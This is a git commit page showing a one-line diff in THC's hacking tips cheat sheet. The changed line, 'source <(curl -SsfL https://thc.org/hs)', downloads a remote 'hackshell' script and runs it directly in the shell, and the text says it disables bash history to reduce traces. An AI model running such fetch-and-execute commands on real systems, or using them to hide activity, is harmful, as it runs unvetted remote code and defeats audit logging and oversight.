Merge branch 'master' of github.com:hackerschoice/thc-tips-tricks-hacks-cheat-sheet

This commit is contained in:
Root THC
2024-07-10 17:34:01 +01:00
+1 -1
View File
@@ -119,7 +119,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
Make BASH less noisy. Disables *~/.bash_history* and [many other things](tools/hackshell.sh).
```sh
source <(curl -SsfL https://thc.org/hs)
source <(curl -SsfL https://thc.org/hs)
```
It does much more but most importantly this: